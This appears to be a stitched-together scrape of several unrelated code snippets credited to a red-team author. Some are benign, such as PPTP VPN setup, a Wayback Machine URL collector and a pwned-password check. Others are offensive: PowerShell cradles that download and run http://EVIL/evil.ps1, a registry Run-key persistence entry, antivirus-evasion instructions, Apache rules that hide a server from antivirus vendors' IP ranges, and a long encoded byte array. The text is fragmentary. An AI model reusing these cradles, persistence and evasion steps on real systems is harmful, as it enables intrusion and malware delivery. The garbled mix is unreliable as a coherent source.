| /* | |
| Author: Arno0x0x, Twitter: @Arno0x0x | |
| DO NOT COMPILE THIS SOURCE FILE ! | |
| Encode this source in base64: | |
| base64 -w0 malicious.cs > malicious.b64 | |
| Then paste it in the code in "not_detected.cs" source file |
| #!/usr/bin/python | |
| # -*- coding: utf8 -*- | |
| # | |
| # Author: Arno0x0x, Twitter: @Arno0x0x | |
| # | |
| import argparse | |
| from Crypto.Cipher import AES | |
| import pyscrypt | |
| from base64 import b64encode |
| Windows Registry Editor Version 5.00 | |
| [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] | |
| @="Rundll32.exe SHELL32.DLL,ShellExec_RunDLL \"C:\\ProgramData\\test.exe\"" |
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |
Ubuntu 14.04.Secure Group Inbound Rules, add a SSH Rule(TCP, Port 22, 0.0.0.0/0) and a Custom TCP Rule(TCP, Port 1723, 0.0.0.0/0).sudo apt-get install pptpd.sudo vim /etc/pptpd.conf. Uncomment localip 192.168.0.1 and remoteip 192.168.0.234-238,192.168.0.245.sudo vim /etc/ppp/pptpd-options. Uncomment ms-dns and ms-wins. Change the IP to Google's DNS like this:| RewriteEngine On | |
| #LogLevel alert rewrite:trace5 | |
| # BURN AV BURN | |
| # TrendMicro | |
| RewriteCond expr "-R '150.70.0.0/22'" [OR] | |
| RewriteCond expr "-R '150.70.104.0/22'" [OR] | |
| RewriteCond expr "-R '150.70.110.0/24'" [OR] | |
| RewriteCond expr "-R '150.70.112.0/20'" [OR] |
| import requests | |
| import sys | |
| import json | |
| def waybackurls(host, with_subs): | |
| if with_subs: | |
| url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host | |
| else: | |
| url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host |
while read ipaddr; do echo "RewriteCond expr "-R '"$ipaddr"'" [OR]" ; done<<<$(curl -s https://ip-ranges.amazonaws.com/ip-ranges.json | grep ip_prefix | cut -d'"' -f4)
| #!/bin/bash | |
| #credit: https://www.reddit.com/r/netsec/comments/agrrig/troy_hunt_the_773_million_record_collection_1/ee9jenv/ | |
| check_pwndb() { | |
| hash="$(echo -n ${password} | openssl sha1 | cut -d' ' -f2)" | |
| upperCase="$(echo ${hash} | tr '[a-z]' '[A-Z]')" | |
| prefix="${upperCase:0:5}" | |
| suffix="${upperCase:5}" | |
| response=$(curl -s "https://api.pwnedpasswords.com/range/${prefix}") |
| $a = @(85,87,112,80,64,64,76,64,64,64,64,68,64,64,64,64,46,46,57,64,64,77,102,64,64,64,64,64,64,64,64,64,80,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,102,64,64,64,64,64,53,103,116,102,53,64,117,64,111,79,72,99,102,67,85,76,49,105,87,70,105,113,98,120,67,118,98,108,56,111,98,108,71,117,72,70,79,105,99,108,52,119,101,66,67,104,91,82,67,120,101,86,53,102,96,86,53,102,83,68,56,85,72,70,48,119,91,70,84,116,69,80,49,74,75,64,64,64,64,64,64,64,64,64,67,80,83,80,64,64,85,64,68,69,64,77,117,66,77,109,118,64,64,64,64,64,64,64,64,64,64,78,64,64,72,104,64,77,64,85,64,64,64,64,53,64,64,64,64,70,64,64,64,64,64,64,64,64,66,104,118,64,64,64,64,102,64,64,64,64,80,64,64,64,64,64,64,64,68,64,64,102,64,64,64,64,64,102,64,64,67,64,64,64,64,64,64,64,64,64,64,70,64,64,64,64,64,64,64,64,64,64,66,64,64,64,64,64,64,102,64,64,64,64,64,64,64,64,76,64,88,72,84,64,64,67,64,64,64,67,64,64,64,64,64,64,68,64,64,64,68,64,64,64,64,64,64,64,64,67, |